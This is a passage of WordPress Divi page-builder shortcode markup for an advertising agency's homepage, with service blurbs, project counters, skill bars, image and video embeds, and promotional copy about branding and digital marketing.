text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" 